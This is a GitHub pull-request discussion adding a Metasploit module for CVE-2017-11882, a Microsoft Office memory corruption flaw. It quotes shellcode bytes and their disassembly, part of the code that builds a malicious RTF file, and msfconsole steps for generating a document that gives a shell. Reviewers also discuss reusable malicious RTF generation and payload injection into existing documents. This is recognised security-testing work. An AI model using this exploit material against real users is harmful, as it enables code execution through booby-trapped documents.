-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2017-11882 Microsoft Office Memory Corruption #9226
Conversation
I'm wondering why it should be .rtf file? |
@islamTaha12 OLE |
|
||
|
||
|
||
def generate_rtf |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Could this be extracted into something like lib/msf/core/exploit/rtf.rb
and take a parameter payload
or uri
?
This would make malicious rtf file generation reusable and possibly allow for a utility to expand and offer "injection" into existing rtf files.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah, I believe this would be easily possible. Should I put this into that directory, with that name and PR it, with a "command" parameter? @jmartin-r7
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If thats what you're implying, unless im misunderstanding :D
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@realoriginal, I would suggest just refactor this code in a new commit added here, and extract this method into a similar utility as other files in the lib/msf/core/exploit
path.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This still required, since I've now just put an injection style into the module or? @jmartin-r7 all good if so
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not required from my view just a preferred item. The injection style you used is specific to how this module functions with payload being something of a web delivery. We can open an issue to request refactor into of utility for rtf
or maybe really in this case OLE
separately. I since @wwebb-r7 has assigned this PR I will defer to him.
header << "000000000000000000000000000000000000000000000000000000000000000\n" | ||
|
||
|
||
shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
We'll need some documentation or provenance on the shellcode. Either one large block comment or traditional side comments of each instruction. If you reused someone else's and they happen to have that, you can link it and we may be able to push this through and do it afterwards.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No problem, I did use someone elses, and ...Ill go find it :)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Disassembly of the shellcode
0: 1c 00 sbb al,0x0
2: 00 00 add BYTE PTR [eax],al
4: 02 00 add al,BYTE PTR [eax]
6: 9e sahf
7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
d: 00 00 add BYTE PTR [eax],al
f: 00 c8 add al,cl
11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
12: 5c pop esp
13: 00 c4 add ah,al
15: ee out dx,al
16: 5b pop ebx
17: 00 00 add BYTE PTR [eax],al
19: 00 00 add BYTE PTR [eax],al
1b: 00 03 add BYTE PTR [ebx],al
1d: 01 01 add DWORD PTR [ecx],eax
1f: 03 0a add ecx,DWORD PTR [edx]
21: 0a 01 or al,BYTE PTR [ecx]
23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
26: b8 44 eb 71 12 mov eax,0x1271eb44
2b: ba 78 56 34 12 mov edx,0x12345678
30: 31 d0 xor eax,edx
32: 8b 08 mov ecx,DWORD PTR [eax]
34: 8b 09 mov ecx,DWORD PTR [ecx]
36: 8b 09 mov ecx,DWORD PTR [ecx]
38: 66 83 c1 3c add cx,0x3c
3c: 31 db xor ebx,ebx
3e: 53 push ebx
3f: 51 push ecx
40: be 64 3e 72 12 mov esi,0x12723e64
45: 31 d6 xor esi,edx
47: ff 16 call DWORD PTR [esi]
49: 53 push ebx
4a: 66 83 ee 4c sub si,0x4c
4e: ff 10 call DWORD PTR [eax]
50: 90 nop
51: 90 nop
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'll put it next to it
Some other information, PDF. https://29wspy.ru/reversing/CVE-2017-11882.pdf |
Nice, thanks. If you don't get around to adding them to the module by tomorrow night, I may do it myself and send you a PR so we can try to get this merged. |
All good . I should have some time tommorow morning to do it |
Done! :D. Thought I might also try one last thing, to see if I can inject existing RTF's |
Nevermind, figured it out, just had to put return header afterwards. |
I had a comment typed out, but let me look over your new commit first Edit: @realoriginal alright, I was going to suggest an alternate route to get both the rtf injection and the module done separately, but seeing how you're making good progress on it, carry on. |
:D. Sounds good. Yeah after this is done, I was gonna try and look at putting |
A couple of minor things regarding documentation
I'd avoid making relative time references. I'd wager that most would eventually figure it out, but this is potentially confusing to someone looking at this in 2028.
Same thing here along with some other grammatical errors and the mention of a separate PoC. The description in the info hash should stick to the formula
or something along those lines. I'm not going to let those hold up merging though. I'll correct them myself later unless you really want to. |
Ahh I see. fixing now. |
Updated with the appropriate syntax. |
Well that was quick, thanks. If I see anything else I'll take care of it. |
haha thought id take a break from metasploitable CTF and check on the PRs haha. Thank you sir! |
Release NotesThis update adds an exploit for CVE-2017-11882, a memory corruption vulnerability when parsing OLE objects in Microsoft Office |
PR adds the recent
CVE-2017-11882
vulneralbility which allows code execution as the user opening the document. Different than PoC from Embedi, allows more space.Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/fileformat/office_ms17_11882
set PAYLOAD [PAYLOAD]
set FILENAME /path/to/file.rtf
run
Should obtain shell.
Tested
Tested on MS Office 2010 SP 2 Windows 7